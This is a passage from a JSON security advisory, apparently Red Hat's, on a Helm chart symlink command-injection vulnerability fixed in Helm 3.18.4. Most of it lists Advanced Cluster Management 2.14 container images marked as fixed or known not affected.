"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2378905"
}
],
"notes": [
{
"category": "description",
"text": "A command injection vulnerability has been identified in Helm, a package manager for Kubernetes. An attacker can craft a malicious Chart.yaml file with specially linked dependencies in a Chart.lock file. If the Chart.lock file is a symbolic link to an executable file, such as a shell script, and a user attempts to update the dependencies, the crafted content is written to the symlinked file and executed. This can lead to local code execution on the system. This issue has been patched in Helm version 3.18.4, and users should update to this version to mitigate the risk.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "helm.sh/helm/v3: Helm Chart Code Execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although GitOps ships Helm, this product is not vulnerable to this vulnerability as ArgoCD doesn\u0027t use helm dependency update. Additionally ArgoCD scans the whole repository searching for symbolic links that eventually points to a out of bounds destination, this later feature ensures ArgoCD is not vulnerable for this issue. Given this information ArgoCD won\u0027t be updated to pull a new version of Helm in other versions than the currently latest upstream one.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
